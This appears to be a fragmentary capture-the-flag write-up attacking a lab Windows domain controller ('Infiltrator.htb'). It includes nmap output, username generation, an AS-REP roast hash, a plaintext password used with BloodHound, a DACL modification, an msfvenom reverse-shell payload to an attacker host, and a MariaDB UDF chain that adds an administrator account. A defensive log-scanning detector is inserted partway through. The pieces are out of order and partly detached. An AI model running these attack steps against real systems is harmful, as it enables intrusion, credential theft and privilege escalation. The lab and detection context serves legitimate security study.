Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 21:00 EDT
Nmap scan report for 10.10.11.31
Host is up (0.38s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
15220/tcp open  unknown
15230/tcp open  unknown
49667/tcp open  unknown
49690/tcp open  unknown
49691/tcp open  unknown
49694/tcp open  unknown
49723/tcp open  unknown
49746/tcp open  unknown
49879/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 170.18 seconds
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Infiltrator.htb
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-06 00:53:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-06T00:57:50+00:00; -10m07s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-06T00:57:49+00:00; -10m07s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-06T00:57:51+00:00; -10m07s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-06T00:57:49+00:00; -10m07s from scanner time.
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: INFILTRATOR
|   NetBIOS_Domain_Name: INFILTRATOR
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: infiltrator.htb
|   DNS_Computer_Name: dc01.infiltrator.htb
|   DNS_Tree_Name: infiltrator.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-09-06T00:57:05+00:00
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after:  2025-01-29T13:20:17
|_ssl-date: 2024-09-06T00:57:49+00:00; -10m08s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
15220/tcp open  unknown
15230/tcp open  unknown
49667/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49691/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49723/tcp open  msrpc         Microsoft Windows RPC
49746/tcp open  msrpc         Microsoft Windows RPC
49879/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
<h4>.01 David Anderson</h4>
<h4>.02 Olivia Martinez</h4>
<h4>.03 Kevin Turner</h4>
<h4>.04 Amanda Walker</h4>
<h4>.05 Marcus Harris</h4>
<h4>.06 Lauren Clark</h4>
<h4>.07 Ethan Rodriguez</h4>
Use awk to cut the tmp file down to just the part we need:

awk -F'>|<' '{print substr($3,5)}' tmp > username
└─$ cat username
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
Very nice.

SMB Penetration

Now we need to work out the account names on the target system.

A domain user's logon name usually looks like this:
username@xxxx.com
# awk: generate a dictionary of domain usernames
awk '
{
    name = $0
    split(name, parts, " ")
    first = tolower(parts[1])
    last = tolower(parts[2])
    print first "." last "@infiltrator.htb"
    print first "_" last "@infiltrator.htb"
    print substr(first, 1, 1) "." last "@infiltrator.htb"
    print substr(first, 1, 1) "_" last "@infiltrator.htb"
}
' username > AD_username
[-] User o.martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User e.rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:52c941038bffe158a729e721a83eca5c$2478d99303d3d9edfd1cbadb41a6463a2df4a97acdf4da4e2c185394c651e78019bb401643cd1c86cd20f9edc5b81025b12fcc553aaa2db741eee0ce7d0a2b86b6ef1a71bf90fb31d7d4cd5d7a6fb44a89cd64613d263e59d00910d52924d2dfb21a0c6db95e996cb51806865d536252484a78a81238161462bb029cdf37c0181e85f038578216f4653351edfb24c46e10faafe0536a539e7a2c52ffccd5503031c177e0564b1b431bc7e02cc1424628dd238503c0a1f58e5398dfb9d9985307f650f52f1165317a20617a2bb4aa2872113f6f3ceb218e226d97551dd599c3cff76e5b47bdfa6d8517f92733073d702951b4
Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash:
[*] Requesting shares on dc01.infiltrator.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
└─$ bloodhound-python -d infiltrator.htb -u d.anderson -p 'WAT?watismypass!' -c all -ns 10.10.11.31 --zip
INFO: Found AD domain: infiltrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Found 14 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.infiltrator.htb
INFO: Done in 01M 03S
INFO: Compressing output into 20240906085109_bloodhound.zip
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240906-093926.bak
[*] DACL modified successfully!
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=9001 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
C:\Users\M.harris>dir "c:\Program Files\Output Messenger\"
dir "c:\Program Files\Output Messenger\"
 Volume in drive C has no label.
 Volume Serial Number is 96C7-B603
C:\Users\M.harris>dir "C:/Program Files/Output Messenger Server/Plugins/"
dir "C:/Program Files/Output Messenger Server/Plugins/"
 Volume in drive C has no label.
 Volume Serial Number is 96C7-B603

 Directory of C:\Program Files\Output Messenger Server\Plugins
# Check the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C:\\Users\\M.harris\\lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
MariaDB [outputwall]> show variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.905 sec)
Damn, that folder really doesn't exist, and my user (m.harris) has no write permission there, so there is no way to make the change.

MariaDB [mysql]> SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll';
ERROR 1 (HY000): Can't create/write to file 'C:\Program Files\Output Messenger Server\Plugins\Output\mysql\lib\plugin\lib_mysqludf_sys_32.dll' (Errcode: 2 "No such file or directory")
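A defender-side check for the UDF load chain shown above, added here as an example (not code from the writeup): it scans MySQL/MariaDB general-log lines for load_file(), INTO DUMPFILE targeting the plugin directory, CREATE FUNCTION ... SONAME and sys_exec() within one session. The log lines are constructed, and the assumed log shape is `<timestamp> <thread_id> Query <sql>`; the plugin path is the one the server reported above.

```python
import re

# Plugin directory the server reported in the writeup above.
PLUGIN_DIR = r"C:\Program Files\Output Messenger Server\Plugins\Output\mysql\lib\plugin"

# One pattern per stage of the UDF load chain; all case-insensitive.
STAGES = {
    "read_dll":   re.compile(r"load_file\s*\(", re.I),
    "dumpfile":   re.compile(r"into\s+dumpfile\s+'([^']+)'", re.I),
    "create_udf": re.compile(r"create\s+function\s+\w+\s+returns\s+\w+\s+soname", re.I),
    "exec_udf":   re.compile(r"\bsys_(?:exec|eval)\s*\(", re.I),
}

# Assumed general-log line shape: "<timestamp> <thread_id> Query <sql>".
LOG_LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")

def _norm(path):
    """Collapse escaped or mixed separators so Windows paths compare reliably."""
    return re.sub(r"[\\/]+", "/", path).lower().rstrip("/")

def audit(lines, plugin_dir=PLUGIN_DIR):
    """Map thread_id -> set of chain stages seen. A DUMPFILE only counts when
    its target lies under plugin_dir; exports elsewhere are ordinary noise."""
    findings = {}
    plugin = _norm(plugin_dir)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        tid, sql = m.groups()
        for stage, rx in STAGES.items():
            hit = rx.search(sql)
            if hit and (stage != "dumpfile" or _norm(hit.group(1)).startswith(plugin)):
                findings.setdefault(tid, set()).add(stage)
    return findings

def suspicious_sessions(lines, min_stages=3):
    """Thread ids that completed at least min_stages stages of the chain."""
    return sorted(t for t, s in audit(lines).items() if len(s) >= min_stages)

# Constructed sample: thread 12 mirrors the chain above, thread 15 is a benign export.
SAMPLE_LOG = [
    "2024-09-06T06:20:01.000000Z 12 Connect m.harris@localhost on outputwall",
    "2024-09-06T06:20:02.000000Z 12 Query CREATE TABLE npn(line blob)",
    r"2024-09-06T06:20:03.000000Z 12 Query INSERT INTO npn values(load_file('C:\\Users\\M.harris\\lib_mysqludf_sys.dll'))",
    r"2024-09-06T06:20:04.000000Z 12 Query SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll'",
    "2024-09-06T06:20:05.000000Z 12 Query CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'",
    "2024-09-06T06:20:06.000000Z 12 Query SELECT sys_exec('whoami')",
    r"2024-09-06T06:20:07.000000Z 15 Query SELECT id, body FROM posts INTO DUMPFILE 'C:\\Temp\\export.csv'",
]
```

On a live server the same lines come from the general log (`general_log=ON`, `log_output=FILE`); the empty `secure_file_priv` shown above is what lets DUMPFILE reach the plugin directory at all, so pair this check with a non-empty `secure_file_priv` pointing at a dedicated export directory.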
02/23/2024  06:06 AM    <DIR>          .
02/23/2024  06:06 AM    <DIR>          ..
12/04/2023  10:22 AM    <DIR>          Common Files
08/21/2024  01:50 PM    <DIR>          Hyper-V
02/19/2024  04:52 AM    <DIR>          internet explorer
02/23/2024  06:06 AM    <DIR>          Output Messenger
09/06/2024  06:17 AM    <DIR>          Output Messenger Server
12/12/2023  11:04 AM    <DIR>          PackageManagement
02/19/2024  05:16 AM    <DIR>          Update Services
12/04/2023  10:23 AM    <DIR>          VMware
11/05/2022  12:03 PM    <DIR>          Windows Defender
08/21/2024  01:50 PM    <DIR>          Windows Defender Advanced Threat Protection
11/05/2022  12:03 PM    <DIR>          Windows Mail
08/21/2024  01:50 PM    <DIR>          Windows Media Player
09/15/2018  12:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  12:28 AM    <DIR>          windows nt
11/05/2022  12:03 PM    <DIR>          Windows Photo Viewer
09/15/2018  12:19 AM    <DIR>          Windows Portable Devices
09/15/2018  12:19 AM    <DIR>          Windows Security
12/12/2023  11:04 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              20 Dir(s)  46,382,149,632 bytes free